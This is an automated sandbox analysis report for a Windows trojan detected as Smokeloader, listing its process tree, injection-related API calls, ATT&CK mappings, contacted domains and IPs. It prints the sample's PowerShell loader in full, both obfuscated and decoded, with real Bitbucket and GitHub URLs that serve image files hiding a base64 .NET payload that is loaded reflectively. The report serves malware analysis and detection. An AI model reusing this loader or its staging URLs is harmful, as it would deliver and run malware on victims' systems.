        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: Conversions.ToGenericParameter<CreateApi>((object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(ref name), ref method), typeof(CreateApi)))
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: ReadProcessMemory(processInformation.ProcessHandle, num4 + 8, ref buffer, 4, ref bytesRead)
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: VirtualAllocEx(processInformation.ProcessHandle, num3, length, 12288, 64)
        Source: 11.2.powershell.exe.2498e03c5e0.1.raw.unpack, Progrgdfam3.csReference to suspicious API methods: WriteProcessMemory(processInformation.ProcessHandle, num5, payload, bufferSize, ref bytesRead)
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$H
M$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.IkIhcga/sdaolnwod/sfwqeqw/twqewqe/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E812EC GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,LocalFree,CloseHandle,4_2_00007FF7E6E812EC
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information (each path listed once; the report records repeated queries of the same paths):
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll
            C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll
            C:\
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll
            C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat
            C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll
            C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0513~31bf3856ad364e35~amd64~~10.0.19041.1949.cat
            C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll
            C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat
            C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll
            C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll
            C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WindowsSearch.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsSearch.Commands.dll
            C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E88964 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,4_2_00007FF7E6E88964
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exeCode function: 4_2_00007FF7E6E82C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,4_2_00007FF7E6E82C54
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        MITRE ATT&CK Matrix (number of matching signatures in parentheses; entries without a number had no matching signature in this analysis)

        Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
        Resource Development: Scripting (111); Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
        Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
        Execution: Native API (12); Exploitation for Client Execution (1); Command and Scripting Interpreter (2); PowerShell (2); Launchd; Scheduled Task; Systemd Timers
        Persistence: Scripting (111); DLL Side-Loading (1); Registry Run Keys / Startup Folder (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
        Privilege Escalation: DLL Side-Loading (1); Access Token Manipulation (1); Process Injection (11); Registry Run Keys / Startup Folder (1); Network Logon Script; RC Scripts; Startup Items
        Defense Evasion: Software Packing (1); Timestomp (1); DLL Side-Loading (1); Masquerading (1); Virtualization/Sandbox Evasion (21); Access Token Manipulation (1); Process Injection (11)
        Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
        Discovery: System Time Discovery (1); File and Directory Discovery (2); System Information Discovery (16); Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1)
        Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
        Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
        Command and Control: Ingress Tool Transfer (1); Encrypted Channel (21); Non-Application Layer Protocol (2); Application Layer Protocol (3); Fallback Channels; Multiband Communication; Commonly Used Port
        Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
        Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
        Behavior Graph (ID 1576152; sample GdGXG0bnxH.exe; start date 16/12/2024; architecture WINDOWS; score 100)

        Process tree:
            GdGXG0bnxH.exe
                cmd.exe
                    conhost.exe
                    wscript.exe
                        [Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); Windows Scripting host queries suspicious COM object (likely to drop second stage); Suspicious execution chain found]
                        powershell.exe
                            [Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading]
                            conhost.exe
                            powershell.exe
                                [Loading BitLocker PowerShell Module]
                                -> raw.githubusercontent.com 185.199.109.133:443 (local port 49701), FASTLYUS, Netherlands
                                -> bitbucket.org 185.166.143.50:443 (local ports 49700, 49728), AMAZON-02US, Germany

        Other network endpoints: s3-w.us-east-1.amazonaws.com; s3-1-w.amazonaws.com; 3 other IPs or domains
        Sample-level signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 11 other signatures

        Antivirus detection (Source | Detection | Scanner | Label)
        GdGXG0bnxH.exe | 39% | ReversingLabs | Win64.Trojan.Smokeloader
        No Antivirus matches (reported for each of the four remaining scan categories)
        Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)
        s3-w.us-east-1.amazonaws.com | 16.182.39.201 | true | false | - | high
        bitbucket.org | 185.166.143.50 | true | false | - | high
        raw.githubusercontent.com | 185.199.109.133 | true | false | - | high
        bbuseruploads.s3.amazonaws.com | unknown | unknown | false | - | high
        Contacted URLs (Name | Malicious | Antivirus Detection | Reputation)
        https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611 | false | - | high
        https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg | false | - | high
        https://bitbucket.org/eqweqwt/wqeqwfs/downloads/agchIkI.txt | false | - | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbuseruploads.s3.amazonaws.com | powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net | powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 0000000B.00000002.1497423977.000002498E5F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://bitbucket.org | powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://web-security-reports.services.atlassian.com/csp-report/bb-website | powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelpX | powershell.exe, 0000000B.00000002.1497423977.000002498E5F9000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net | powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://dz8aopenkvv6s.cloudfront.net | powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbuseruploads.s3.amazonaws.com/84b86a50-0f03-4f00-a68a-9b48f6a9ad1a/downloads/0d99d38f-9760- | powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://raw.githubusercontent.com | powershell.exe, 0000000B.00000002.1497423977.0000024987308000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net | powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ion=v4.5 | powershell.exe, 0000000B.00000002.1497143877.0000024986D3E000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.cookielaw.org/ | powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; | powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aui-cdn.atlassian.com/ | powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000009.00000002.1829289643.00000179CF97C000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 00000009.00000002.1829289643.00000179CF911000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://s3-w.us-east-1.amazonaws.com | powershell.exe, 0000000B.00000002.1497423977.000002498E390000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000009.00000002.1829289643.00000179CF911000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://bitbucket.org | powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp; powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://bbuseruploads.s3.amazonaws.com | powershell.exe, 0000000B.00000002.1497423977.000002498E390000.00000004.00000800.00020000.00000000.sdmp | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
185.199.109.133 | raw.githubusercontent.com | Netherlands | 54113 | FASTLYUS | false
185.166.143.50 | bitbucket.org | Germany | 16509 | AMAZON-02US | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1576152
Start date and time: 2024-12-16 15:35:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 28s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: GdGXG0bnxH.exe (renamed because original name is a hash value)
Original Sample Name: 8970eef61ba5b0d180b01242796bad53.exe
Detection: MAL
Classification: mal100.spre.expl.evad.winEXE@12/9@4/2
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 50%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  • Number of executed functions: 28
                                                                                  • Number of non-executed functions: 29
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 13.107.246.63, 52.149.20.212
                                                                                  • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Execution Graph export aborted for target powershell.exe, PID 7412 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: GdGXG0bnxH.exe
Time | Type | Description
09:36:11 | API Interceptor | 87x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.199.109.133 | cr_asm3.ps1 | malicious | Unknown | raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
